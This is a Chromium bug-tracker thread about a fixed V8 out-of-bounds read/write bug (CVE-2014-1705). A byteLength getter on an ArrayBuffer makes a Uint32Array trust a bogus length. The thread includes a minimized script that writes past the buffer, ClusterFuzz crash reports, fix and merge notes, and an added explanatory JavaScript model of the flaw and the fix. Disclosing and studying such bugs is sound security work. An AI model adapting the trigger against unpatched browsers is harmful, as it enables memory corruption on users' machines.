Starred by 7 users
Status: Fixed
Owner:
Closed: Mar 2014
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: ----
Type: Bug-Security

Blocking:
issue 351788
issue 352420



Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength
Project Member Reported by infe...@chromium.org, Mar 12 2014
v8 OOB bug
Attachment: simple32.js (6.9 KB)
Blocking: chromium:351788
Labels: -Restrict-View-SecurityEmbargo
Comment 4 by jochen@chromium.org, Mar 12 2014
Cc: dslomov@chromium.org
Comment 5 by parisa@chromium.org, Mar 12 2014
Cc: olofj@chromium.org
Labels: Security_Impact-Beta Security_Impact-Stable Security_Severity-High
Summary: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength (was: Pwnium: v8 OOB )
Project Member Comment 7 by clusterf...@chromium.org, Mar 12 2014
Summary: UNKNOWN in v8::internal::Invoke (was: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048

Uploader: inferno@chromium.org
Job Type: Linux_asan_chrome_mp

Crash Type: UNKNOWN
Crash Address: 0x609000150000
Crash State:
  - crash stack -
  v8::internal::Invoke
  v8::Script::Run
  WebCore::V8ScriptRunner::runCompiledScript
  

Minimized Testcase (0.21 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A
<script>
var ab = new ArrayBuffer(8);
// Shadow byteLength on the instance with a getter returning a bogus size;
// the typed-array constructor trusted this property read instead of the real 8 bytes.
ab.__defineGetter__("byteLength", function() { return 0xFFFFFFFC; });
var aaa = new Uint32Array(ab);

// Writes run past the real backing store once the length check is fooled.
for (var i = 0; i < 0x8000; i += 1) {
  aaa[i] = 1;
}
</script>


Summary: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength (was: UNKNOWN in v8::internal::Invoke)
Comment 9 by danno@chromium.org, Mar 12 2014
Cc: jkummerow@chromium.org
(summarizing for the V8 team): The V8 fix is for all trusted usages of properties on ArrayBuffers and other TypedArray variants to use un-patchable intrinsics rather than a property access.

Jakob has a patch that fixes this specific problem, but we're auditing the rest of the TypedArray code for similar problems.
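The principle behind the fix described above, as an added JavaScript model that is not from the bug thread or the V8 patch: a builtin that reads the observable `byteLength` property can be fooled by a script-defined getter, while one that asks the engine through an un-patchable accessor (captured here before any untrusted code runs, standing in for V8's real intrinsic) cannot. The names `lengthViaProperty`, `lengthViaIntrinsic`, `checkedElementCount`, `isShadowed` and `demo` are hypothetical.

```javascript
// Captured once, before any page script runs. In V8 proper this role is
// played by an intrinsic, not a JavaScript getter; the capture is the model.
const intrinsicByteLength = Object.getOwnPropertyDescriptor(
  ArrayBuffer.prototype, 'byteLength').get;

// Bug pattern: trusts the observable property, which a script can shadow
// on the instance or anywhere along its prototype chain.
function lengthViaProperty(buffer) {
  return buffer.byteLength;
}

// Fixed pattern: reads the internal slot directly; an own-property getter
// defined by the page is never consulted.
function lengthViaIntrinsic(buffer) {
  return intrinsicByteLength.call(buffer);
}

// Models the typed-array constructor deriving its element count from the
// chosen length source. Returns the count it would expose.
function checkedElementCount(buffer, bytesPerElement, lengthSource) {
  const byteLength = lengthSource(buffer);
  if (byteLength % bytesPerElement !== 0) {
    throw new RangeError('byte length not a multiple of element size');
  }
  return byteLength / bytesPerElement;
}

// Defender-side sanity check: a mismatch between the two sources means
// something has shadowed byteLength on this buffer.
function isShadowed(buffer) {
  return lengthViaProperty(buffer) !== lengthViaIntrinsic(buffer);
}

function demo() {
  const ab = new ArrayBuffer(8);
  // Same override as the minimized test case in the report (constructed input).
  ab.__defineGetter__('byteLength', function () { return 0xFFFFFFFC; });
  return {
    viaProperty: checkedElementCount(ab, 4, lengthViaProperty),   // bogus: 0x3FFFFFFF
    viaIntrinsic: checkedElementCount(ab, 4, lengthViaIntrinsic), // real: 2
    shadowed: isShadowed(ab),                                     // true
  };
}
```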
Comment 10 by danno@chromium.org, Mar 12 2014
Cc: marja@chromium.org yangguo@chromium.org
Status: Fixed
Fixed in V8 bleeding_edge: https://code.google.com/p/v8/source/detail?r=19862.

Merged to M33 as V8 3.23.17.23.
Merged to M34 as V8 3.24.35.15.
Labels: Release-3-M33
Project Member Comment 13 by clusterf...@chromium.org, Mar 12 2014
Summary: UNKNOWN in WebCore::Document::popCurrentScript (was: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048

Uploader: inferno@chromium.org
Job Type: Linux_asan_chrome_mp

Crash Type: UNKNOWN
Crash Address: 0x00009fff8002
Crash State:
  - crash stack -
  WebCore::Document::popCurrentScript
  WebCore::ScriptLoader::executeScript
  WebCore::ScriptLoader::prepareScript
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=234419:234464

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A


Summary: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength (was: UNKNOWN in WebCore::Document::popCurrentScript)
Cc: deepakg@chromium.org
Cc: haraken@chromium.org
Project Member Comment 17 by clusterf...@chromium.org, Mar 13 2014
Summary: Heap-buffer-overflow in v8::internal::Runtime_ArrayBufferSliceImpl (was: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5905159708213248

Fuzzer: Mbarbella_js_mutation
Job Type: Linux_asan_d8_v8_arm

Crash Type: Heap-buffer-overflow READ 100000
Crash Address: 0xf5fcb3e0
Crash State:
  - crash stack -
  v8::internal::Runtime_ArrayBufferSliceImpl
  v8::internal::Simulator::SoftwareInterrupt
  v8::internal::Simulator::InstructionDecode
  

Minimized Testcase (3.50 Kb): https://cluster-fuzz.appspot.com/download/AMIfv940PeGBCMH8eFQpTfxqfeTehbbuuHbU-SfxhHHAB-1DJ3LMEoVU1tY-IFHG4LPXxpip_hohSuIJTEYFxY-XVlWwaiFfPY3-sBT7lazDV-TSiYP07VsE6MJSXYhFrp2z8Qe6XVSJq6H22maA1cyBdkPG2rzyng


Summary: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength (was: Heap-buffer-overflow in v8::internal::Runtime_ArrayBufferSliceImpl)
We get much better stacks from the ARM build, logged above just for reference.
Blocking: chromium:352420
Labels: CVE-2014-1705
Labels: ZDI-CAN-2235
Labels: -ZDI-CAN-2235 ZDI-CAN-2233
Cc: br...@gorenc.net
Project Member Comment 24 by clusterf...@chromium.org, Mar 14 2014
Summary: UNKNOWN in WebCore::Document::popCurrentScript (was: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength)
Summary: Pwnium 4: v8 OOB read/write with __defineGetter__ and bytesLength (was: UNKNOWN in WebCore::Document::popCurrentScript)
Comment 26 by k...@google.com, Mar 14 2014
Cc: kamakshi@chromium.org
Project Member Comment 27 by clusterf...@chromium.org, Mar 14 2014
ClusterFuzz has detected this issue as fixed in range 256789:256846.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5720086883074048

Uploader: inferno@chromium.org
Job Type: Linux_asan_chrome_mp

Crash Type: UNKNOWN
Crash Address: 0x00009fff8002
Crash State:
  - crash stack -
  WebCore::Document::popCurrentScript
  WebCore::ScriptLoader::executeScript
  WebCore::ScriptLoader::prepareScript
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=234419:234464
Fixed: https://cluster-fuzz.appspot.com/revisions?range=256789:256846

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv972juZ8LFn7J8O9Gg3Ksg9ugGIInvgfeq-7w0wESmJ87-B5cZuy1gOXc8BmlNA4VBeFRZ1QmRP4O2w32AsPvaJtrL3wOokxkhQ_8GO2j8EcOIawwRj-vn1VcvCgQpF7XNfucx33vc_3HFSLZmyKwYo2b8yN5A

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.

Project Member Comment 28 by clusterf...@chromium.org, Mar 14 2014
ClusterFuzz has detected this issue as fixed in range 256789:256846.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5905159708213248

Fuzzer: Mbarbella_js_mutation
Job Type: Linux_asan_d8_v8_arm

Crash Type: Heap-buffer-overflow READ 100000
Crash Address: 0xf5fcb3e0
Crash State:
  - crash stack -
  v8::internal::Runtime_ArrayBufferSliceImpl
  v8::internal::Simulator::SoftwareInterrupt
  v8::internal::Simulator::InstructionDecode
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=256789:256846

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv940PeGBCMH8eFQpTfxqfeTehbbuuHbU-SfxhHHAB-1DJ3LMEoVU1tY-IFHG4LPXxpip_hohSuIJTEYFxY-XVlWwaiFfPY3-sBT7lazDV-TSiYP07VsE6MJSXYhFrp2z8Qe6XVSJq6H22maA1cyBdkPG2rzyng

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.

Cc: mbevand@google.com
Project Member Comment 30 by clusterf...@chromium.org, Jun 18 2014
Labels: -Restrict-View-SecurityTeam
Bulk update: removing view restriction from closed bugs.
Project Member Comment 31 by clusterf...@chromium.org, Feb 2 2016
Labels: -Security_Impact-Beta
Project Member Comment 32 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 33 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 34 by sheriffbot@chromium.org, Oct 2 2016
Labels: Restrict-View-SecurityNotify
Labels: allpublic
Project Member Comment 36 by sheriffbot@chromium.org, Oct 3 2016
Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot